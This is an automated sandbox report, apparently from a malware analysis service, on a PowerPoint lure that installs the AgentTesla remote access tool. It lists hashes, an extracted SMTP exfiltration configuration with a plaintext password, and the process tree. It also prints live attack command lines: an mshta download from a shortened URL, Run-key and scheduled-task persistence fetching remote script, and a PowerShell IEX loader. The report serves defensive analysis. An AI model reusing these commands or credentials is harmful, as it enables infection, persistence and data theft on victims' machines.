Analysis
-
max time kernel
119s -
max time network
139s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
22-04-2021 07:21
Static task
static1
Behavioral task
behavioral1
Sample
RFQ No3756368.ppt
Resource
win7v20210408
Behavioral task
behavioral2
Sample
RFQ No3756368.ppt
Resource
win10v20210410
General
-
Target
RFQ No3756368.ppt
-
Size
78KB
-
MD5
4b485ae386bfa68a2eeac2dc35bda606
-
SHA1
8086ec71e34fd18a1a8e3e20721bc466caf3cda4
-
SHA256
99b84223a505faa4dcd483e6e925dddfe5a890b41aa92b5e4ef5239a26036075
-
SHA512
7918aedf847172a8dfed81931ebe5247a627922d5042d6a10799089dd8bb711a1a8f4dc5301e5b65a0f8a27d11f8d815b7d615bb157854a70d1b5a93e8cb09d5
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.raceinfo.co.za - Port:
587 - Username:
[email protected] - Password:
@ProtimeSport2021
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process 1532 1776 mshta.exe POWERPNT.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 324 1372 powershell.exe -
AgentTesla Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1320-83-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla behavioral1/memory/1320-84-0x00000000004375FE-mapping.dmp family_agenttesla behavioral1/memory/1320-85-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla -
Blocklisted process makes network request 16 IoCs
Processes:
mshta.exepowershell.exeflow pid process 6 1532 mshta.exe 8 1532 mshta.exe 10 1532 mshta.exe 12 1532 mshta.exe 14 1532 mshta.exe 15 1532 mshta.exe 17 1532 mshta.exe 19 1532 mshta.exe 23 1532 mshta.exe 24 1532 mshta.exe 25 1532 mshta.exe 26 1532 mshta.exe 27 1532 mshta.exe 29 1532 mshta.exe 32 324 powershell.exe 34 324 powershell.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
mshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).MSOFFICELO)|IEX\"\", 0 : window.close\")" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "\"mshta\"\"http://1230948%[email protected]/p/47.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"http://1230948%[email protected]/p/47.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "\"mshta\"\"http://1230948%[email protected]/p/47.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)|IEX\"\", 0 : window.close\")" mshta.exe Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 324 set thread context of 1320 324 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 368 taskkill.exe 1992 taskkill.exe -
Processes:
POWERPNT.EXEmshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt POWERPNT.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" POWERPNT.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 64 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F0-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E554-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345F-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493460-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493466-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346C-5A91-11CF-8700-00AA0060263B}\ = "_Master" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A51-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A71-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493450-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493475-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C5-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CB-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348F-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493492-5A91-11CF-8700-00AA0060263B}\ = "RulerLevel" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E2-5A91-11CF-8700-00AA0060263B}\ = "EffectInformation" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934ED-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346E-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493486-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348B-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348C-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A55-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A65-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6E-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E55A-4FF5-48F4-8215-5505F990966F}\ = "ProtectedViewWindow" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493450-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493472-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CE-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5A-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6A-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493462-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348A-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349A-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A56-F07E-4CA4-AF6F-BEF486AA4E6F} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A64-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493477-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347E-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E4-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F9-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E9-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E555-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347C-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349D-5A91-11CF-8700-00AA0060263B}\ = "_Presentation" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D4-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D6-5A91-11CF-8700-00AA0060263B}\TypeLib POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A55-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a" POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493450-5A91-11CF-8700-00AA0060263B}\ = "Collection" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348C-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349A-5A91-11CF-8700-00AA0060263B} POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A53-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493495-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E555-4FF5-48F4-8215-5505F990966F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E558-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32 POWERPNT.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" POWERPNT.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D8-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}" POWERPNT.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 1776 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
powershell.exeaspnet_compiler.exepid process 324 powershell.exe 324 powershell.exe 324 powershell.exe 324 powershell.exe 324 powershell.exe 324 powershell.exe 324 powershell.exe 324 powershell.exe 324 powershell.exe 324 powershell.exe 324 powershell.exe 324 powershell.exe 324 powershell.exe 324 powershell.exe 1320 aspnet_compiler.exe 1320 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
powershell.exetaskkill.exetaskkill.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 324 powershell.exe Token: SeDebugPrivilege 368 taskkill.exe Token: SeDebugPrivilege 1992 taskkill.exe Token: SeIncreaseQuotaPrivilege 324 powershell.exe Token: SeSecurityPrivilege 324 powershell.exe Token: SeTakeOwnershipPrivilege 324 powershell.exe Token: SeLoadDriverPrivilege 324 powershell.exe Token: SeSystemProfilePrivilege 324 powershell.exe Token: SeSystemtimePrivilege 324 powershell.exe Token: SeProfSingleProcessPrivilege 324 powershell.exe Token: SeIncBasePriorityPrivilege 324 powershell.exe Token: SeCreatePagefilePrivilege 324 powershell.exe Token: SeBackupPrivilege 324 powershell.exe Token: SeRestorePrivilege 324 powershell.exe Token: SeShutdownPrivilege 324 powershell.exe Token: SeDebugPrivilege 324 powershell.exe Token: SeSystemEnvironmentPrivilege 324 powershell.exe Token: SeRemoteShutdownPrivilege 324 powershell.exe Token: SeUndockPrivilege 324 powershell.exe Token: SeManageVolumePrivilege 324 powershell.exe Token: 33 324 powershell.exe Token: 34 324 powershell.exe Token: 35 324 powershell.exe Token: SeIncreaseQuotaPrivilege 324 powershell.exe Token: SeSecurityPrivilege 324 powershell.exe Token: SeTakeOwnershipPrivilege 324 powershell.exe Token: SeLoadDriverPrivilege 324 powershell.exe Token: SeSystemProfilePrivilege 324 powershell.exe Token: SeSystemtimePrivilege 324 powershell.exe Token: SeProfSingleProcessPrivilege 324 powershell.exe Token: SeIncBasePriorityPrivilege 324 powershell.exe Token: SeCreatePagefilePrivilege 324 powershell.exe Token: SeBackupPrivilege 324 powershell.exe Token: SeRestorePrivilege 324 powershell.exe Token: SeShutdownPrivilege 324 powershell.exe Token: SeDebugPrivilege 324 powershell.exe Token: SeSystemEnvironmentPrivilege 324 powershell.exe Token: SeRemoteShutdownPrivilege 324 powershell.exe Token: SeUndockPrivilege 324 powershell.exe Token: SeManageVolumePrivilege 324 powershell.exe Token: 33 324 powershell.exe Token: 34 324 powershell.exe Token: 35 324 powershell.exe Token: SeDebugPrivilege 1320 aspnet_compiler.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
POWERPNT.EXEpid process 1776 POWERPNT.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_compiler.exepid process 1320 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 53 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.exedescription pid process target process PID 1776 wrote to memory of 1436 1776 POWERPNT.EXE splwow64.exe PID 1776 wrote to memory of 1436 1776 POWERPNT.EXE splwow64.exe PID 1776 wrote to memory of 1436 1776 POWERPNT.EXE splwow64.exe PID 1776 wrote to memory of 1436 1776 POWERPNT.EXE splwow64.exe PID 1776 wrote to memory of 1532 1776 POWERPNT.EXE mshta.exe PID 1776 wrote to memory of 1532 1776 POWERPNT.EXE mshta.exe PID 1776 wrote to memory of 1532 1776 POWERPNT.EXE mshta.exe PID 1776 wrote to memory of 1532 1776 POWERPNT.EXE mshta.exe PID 1532 wrote to memory of 1612 1532 mshta.exe schtasks.exe PID 1532 wrote to memory of 1612 1532 mshta.exe schtasks.exe PID 1532 wrote to memory of 1612 1532 mshta.exe schtasks.exe PID 1532 wrote to memory of 1612 1532 mshta.exe schtasks.exe PID 1532 wrote to memory of 1992 1532 mshta.exe taskkill.exe PID 1532 wrote to memory of 1992 1532 mshta.exe taskkill.exe PID 1532 wrote to memory of 1992 1532 mshta.exe taskkill.exe PID 1532 wrote to memory of 1992 1532 mshta.exe taskkill.exe PID 1532 wrote to memory of 368 1532 mshta.exe taskkill.exe PID 1532 wrote to memory of 368 1532 mshta.exe taskkill.exe PID 1532 wrote to memory of 368 1532 mshta.exe taskkill.exe PID 1532 wrote to memory of 368 1532 mshta.exe taskkill.exe PID 324 wrote to memory of 992 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 992 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 992 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 992 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1708 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1708 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1708 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1708 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1100 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1100 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1100 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1100 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 2028 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 2028 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 2028 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 2028 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 920 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 920 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 920 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 920 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 852 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 852 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 852 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 852 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1320 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1320 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1320 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1320 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1320 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1320 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1320 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1320 324 powershell.exe aspnet_compiler.exe PID 324 wrote to memory of 1320 324 powershell.exe aspnet_compiler.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\RFQ No3756368.ppt"1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SysWOW64\mshta.exemshta http://www.j.mp/asdaksdjqwoddaskdajk2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/47.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
66dbecb7cc9a6c923cdcdb694bb9ac2d
SHA18b966764dcd7c76a1de845618dfc9dad318c9793
SHA2567bf7e80522731ad55dc0c5abc065e909a859eef377110f3399acf7378cf7d7f9
SHA5123238d99459fb0ada9964dfd7f333d592cf7fe0f84e555f9e19f28efdeaa74592a481310205606a5a154c2bcc6e551971be801fa634a071f88c960003898a63a3
-
memory/324-78-0x000000001B4B0000-0x000000001B4B1000-memory.dmpFilesize
4KB
-
memory/324-71-0x000000001A924000-0x000000001A926000-memory.dmpFilesize
8KB
-
memory/324-81-0x000000001B470000-0x000000001B47D000-memory.dmpFilesize
52KB
-
memory/324-75-0x0000000002380000-0x0000000002381000-memory.dmpFilesize
4KB
-
memory/324-72-0x000000001A8F0000-0x000000001A8F1000-memory.dmpFilesize
4KB
-
memory/324-79-0x000000001C630000-0x000000001C631000-memory.dmpFilesize
4KB
-
memory/324-70-0x000000001A920000-0x000000001A922000-memory.dmpFilesize
8KB
-
memory/324-68-0x0000000002590000-0x0000000002591000-memory.dmpFilesize
4KB
-
memory/324-69-0x000000001A9A0000-0x000000001A9A1000-memory.dmpFilesize
4KB
-
memory/368-74-0x0000000000000000-mapping.dmp
-
memory/1320-84-0x00000000004375FE-mapping.dmp
-
memory/1320-85-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/1320-87-0x0000000004AD0000-0x0000000004AD1000-memory.dmpFilesize
4KB
-
memory/1320-88-0x0000000004AD1000-0x0000000004AD2000-memory.dmpFilesize
4KB
-
memory/1320-83-0x0000000000400000-0x000000000043C000-memory.dmpFilesize
240KB
-
memory/1436-62-0x0000000000000000-mapping.dmp
-
